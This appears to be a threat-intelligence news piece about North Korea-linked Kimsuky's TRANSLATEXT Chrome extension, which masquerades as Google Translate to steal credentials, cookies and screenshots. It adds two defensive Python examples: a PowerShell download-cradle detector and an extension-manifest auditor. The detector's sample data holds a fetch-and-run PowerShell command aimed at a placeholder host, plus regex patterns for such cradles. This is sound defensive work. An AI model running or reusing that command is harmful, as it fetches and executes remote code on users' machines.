Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data

June 28, 2024 at 12:51PM

The North Korea-linked threat actor Kimsuky has been using a new malicious Google Chrome extension, codenamed TRANSLATEXT, to conduct cyber espionage targeting South Korean academia. This extension gathers sensitive information and is designed to bypass security measures, capture browser screenshots, and exfiltrate stolen data. Kimsuky is known for orchestrating cyber espionage and financially motivated attacks, and it has recently utilized a security flaw in Microsoft Office to distribute a keylogger. The group is focused on conducting surveillance on academic and government personnel to gather valuable intelligence.

Kimsuky has been linked to a malicious Google Chrome extension called TRANSLATEXT, designed to steal sensitive information including email addresses, usernames, passwords, cookies, and browser screenshots. Zscaler ThreatLabz first observed the extension in early March 2024 and found it targeting South Korean academia focused on North Korean political affairs.

Kimsuky is known for orchestrating cyber espionage and financially motivated attacks against South Korean entities; it is associated with the Lazarus cluster and operates under the Reconnaissance General Bureau (RGB). The group has recently exploited a known security flaw in Microsoft Office to distribute a keylogger and has used job-themed lures in attacks on the aerospace and defense sectors. CyberArmor has named that campaign Niki; it delivers a backdoor that performs basic reconnaissance and drops additional payloads to take over or remotely control the machine.

The exact mode of initial access for the newly discovered activity is currently unclear, although the group is known to leverage spear-phishing and social engineering attacks. The attack starts with a ZIP archive containing a Hangul Word Processor document and an executable. Launching the executable results in the retrieval of a PowerShell script from an attacker-controlled server, which exports information about the compromised victim to a GitHub repository and downloads additional PowerShell code.
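The chain just described (an executable unpacked from an archive spawns PowerShell, which pulls a script from a remote server and then talks to GitHub) is something endpoint telemetry can flag. The following detector is an added example for defenders and is not code from the article or from any vendor; the event dictionaries are constructed sample records whose field names only loosely mimic Sysmon-style process-creation and network events, the `github.com` destination check is an assumption standing in for "a GitHub repository", and `example.invalid` is a placeholder host.

```python
"""Hypothetical detector for: executable in an archive/temp location -> powershell.exe
with a download cradle -> outbound connection to a code-hosting site.
Added example; event schema and sample records are constructed, not real telemetry."""
import re

# Markers of a PowerShell download cradle or obfuscated launch (case-insensitive).
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)
# Parent images that were unpacked from an archive or dropped into a temp/download folder.
SUSPICIOUS_PARENT_DIR = re.compile(r"\\(Temp|Downloads)\\|Rar\$|\.zip\\", re.IGNORECASE)
POWERSHELL = re.compile(r"\\powershell(_ise)?\.exe$", re.IGNORECASE)

# Constructed sample events (assumption: fields pid/ppid/image/cmd for process events,
# pid/dest/port for network events). Not real telemetry.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"type": "process", "pid": 101, "ppid": 100,
     "image": r"C:\Users\victim\AppData\Local\Temp\Rar$EX\report.exe", "cmd": "report.exe"},
    {"type": "process", "pid": 102, "ppid": 101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://example.invalid/stage2.ps1')\""},
    {"type": "network", "pid": 102, "dest": "github.com", "port": 443},
    # Benign control: an interactive PowerShell started from the shell, no cradle.
    {"type": "process", "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe"},
    {"type": "network", "pid": 200, "dest": "github.com", "port": 443},
]


def detect_cradle_chain(events, code_host_suffix="github.com"):
    """Return one finding per PowerShell process that ran a download cradle and was
    spawned by an executable living in an archive/temp location. Severity is raised
    to 'high' when the same process also contacted the code-hosting domain."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    dests_by_pid = {}
    for e in events:
        if e["type"] == "network":
            dests_by_pid.setdefault(e["pid"], []).append(e["dest"])

    findings = []
    for proc in procs.values():
        if not POWERSHELL.search(proc["image"]):
            continue
        if not DOWNLOAD_CRADLE.search(proc["cmd"]):
            continue
        parent = procs.get(proc["ppid"])
        if parent is None or not SUSPICIOUS_PARENT_DIR.search(parent["image"]):
            continue
        dests = dests_by_pid.get(proc["pid"], [])
        reached_code_host = any(
            d == code_host_suffix or d.endswith("." + code_host_suffix) for d in dests
        )
        findings.append({
            "pid": proc["pid"],
            "parent_image": parent["image"],
            "severity": "high" if reached_code_host else "medium",
            "reason": "download cradle spawned from archive/temp location"
                      + (f" and contacted {code_host_suffix}" if reached_code_host else ""),
        })
    return findings


if __name__ == "__main__":
    for f in detect_cradle_chain(EVENTS):
        print(f)
```

The parent-path condition is what keeps the benign PowerShell session from alerting: the cradle pattern alone fires on plenty of legitimate administration, so the rule only escalates when the spawning executable itself came from an unpacked archive or a download folder, which is the shape of the ZIP-delivered stage on this page.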

The TRANSLATEXT extension, masquerading as Google Translate, incorporates JavaScript code to bypass security measures for services like Google, Kakao, and Naver. It is designed to siphon email addresses, credentials, and cookies, capture browser screenshots, and exfiltrate stolen data. It also fetches commands from a Blogger Blogspot URL in order to take screenshots of newly opened tabs and delete all cookies from the browser, among other functionalities.
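An extension that can read cookies for every site, inject content scripts everywhere and screenshot tabs needs a recognisable set of manifest permissions, and a sideloaded extension carries no Chrome Web Store update URL. The audit below is an added example for defenders, not code from the article or from Zscaler; the two manifests are constructed samples, the permission weightings are this example's own assumptions, and the hypothetical `scan_extensions_dir` helper simply walks a directory tree looking for `manifest.json` files.

```python
"""Added example: audit Chrome extension manifests for the capability profile described
above (cookie access on all sites, content scripts everywhere, tab screenshots, and a
name that impersonates Google Translate without coming from the Web Store)."""
import json
import os

# Permissions that grant credential/cookie/screen access (assumed weighting for this example).
HIGH_RISK_PERMISSIONS = {
    "cookies", "tabs", "webRequest", "webRequestBlocking", "declarativeNetRequest",
    "scripting", "clipboardRead", "desktopCapture",
}
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
IMPERSONATED_NAMES = ("google translate",)
# Extensions installed from the Chrome Web Store carry this update_url.
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"

# Constructed sample manifests (not recovered from the real extension).
SUSPICIOUS_MANIFEST = {
    "manifest_version": 3,
    "name": "Google Translate",
    "version": "1.0",
    "permissions": ["cookies", "tabs", "storage", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    # no update_url: sideloaded rather than installed from the Web Store
}
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Sticky Notes",
    "version": "2.3",
    "permissions": ["storage"],
    "update_url": WEBSTORE_UPDATE_URL,
}


def audit_manifest(manifest):
    """Score one manifest. Handles MV2 (host patterns inside 'permissions') and MV3
    ('host_permissions'). Returns name, verdict and the list of findings."""
    perms = set(manifest.get("permissions", []))
    host_perms = set(manifest.get("host_permissions", [])) | {
        p for p in perms if "://" in p or p == "<all_urls>"
    }
    content_matches = {
        m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])
    }
    broad_hosts = bool(host_perms & BROAD_HOST_PATTERNS)
    findings = []

    risky = sorted(perms & HIGH_RISK_PERMISSIONS)
    if risky:
        findings.append("high-risk permissions: " + ", ".join(risky))
    if broad_hosts or content_matches & BROAD_HOST_PATTERNS:
        findings.append("content scripts or host access on every site")
    if "cookies" in perms and broad_hosts:
        findings.append("can read cookies for every site (session theft capability)")
    if "tabs" in perms and broad_hosts:
        findings.append("can screenshot any tab via tabs.captureVisibleTab")
    name = str(manifest.get("name", "")).lower()
    if any(n in name for n in IMPERSONATED_NAMES) and manifest.get("update_url") != WEBSTORE_UPDATE_URL:
        findings.append("name impersonates a well-known extension but was not installed from the Web Store")

    verdict = "suspicious" if len(findings) >= 2 else "review" if findings else "ok"
    return {"name": manifest.get("name"), "verdict": verdict, "findings": findings}


def scan_extensions_dir(root):
    """Hypothetical helper: audit every manifest.json below a Chrome profile's Extensions folder."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        if "manifest.json" not in files:
            continue
        with open(os.path.join(dirpath, "manifest.json"), encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except json.JSONDecodeError:
                continue  # skip unreadable manifests rather than abort the scan
        results.append(audit_manifest(manifest))
    return results


if __name__ == "__main__":
    for m in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        print(json.dumps(audit_manifest(m), indent=2))
```

On a live host the Extensions folder sits under the Chrome user data directory (for example `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions` on Windows, an assumed default location), so `scan_extensions_dir` can be pointed there. Note that a Web Store manifest may localise its name as `__MSG_...__`, in which case the impersonation check needs the extension's `_locales` messages rather than the raw `name` field.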

Kimsuky's aim is to conduct surveillance on academic and government personnel in order to gather valuable intelligence.
